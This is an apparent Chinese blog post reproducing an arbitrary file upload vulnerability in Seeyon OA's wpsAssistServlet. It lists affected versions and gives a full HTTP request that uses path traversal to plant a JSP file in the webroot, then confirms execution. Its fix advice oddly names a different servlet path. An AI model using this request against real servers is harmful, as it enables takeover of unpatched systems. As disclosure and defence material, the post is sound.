热门标签
热门文章
- 1【论文阅读】2021中国法研杯司法考试数据集研究(CAIL2021)_法研杯2021刑期预测数据集
- 2python的dict理解_对dict项目的理解与支撑思路
- 3StableDiffusion下载部署及相关参数介绍_stable diffusion放大算法下载
- 4不会代码没有Key如何使用中科院学术专用版 ChatGPT的方法(内附免费使用ChatGPT plus网址和论文润色的指令模板)_中科院chatgpt怎么用
- 5分享一个格式化大模型输出的prompt,便于做答案对比_让大模型输出表格,然后填空,怎样提问效果会好
- 6dqn 应用案例_深度强化学习在智能对话上的应用(附实例)
- 7Linux环境使用VSCode调试简单C++代码_linux vscode c++
- 8OpenCV 4基础篇| OpenCV图像的拼接_opencv 拼接
- 9YOLOv4阅读笔记(附思维导图)!YOLOv4: Optimal Speed and Accuracy of Object Detection_yolo efficientnet
- 10保姆级教程!安利一款Kali Linux 安装 + 获取 root 权限 + 远程访问!_kali linux下载
当前位置: article > 正文
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
作者:我家小花儿 | 2024-04-08 21:26:19
赞
踩
致远oa wpsassistservlet 任意文件上传漏洞
01 漏洞描述
致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
02 影响范围
致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)
03 利用方式
1、调用文件上传接口上传测试文件,请求包如下:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/test.jsp&fileId=2 HTTP/1.1
Host: 127.0.0.1
Content-Length: 349
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="test.txt"
Content-Type: application/vnd.ms-excel
<% out.println("seeyon_vuln");%>
--59229605f98b8cf290a7b8908b34616b--
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
2、文件上传成功时,响应情况如下图所示:
3、访问上传文件:http://xx.xx.xx.xx/test.jsp,发现该文件成功被服务器解析。
04 修复方案
1、对路径 /seeyon/htmlofficeservlet 进行限制访问。
2、致远官方已发布补丁,请联系官方安装相应补丁。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/388308
推荐阅读
相关标签
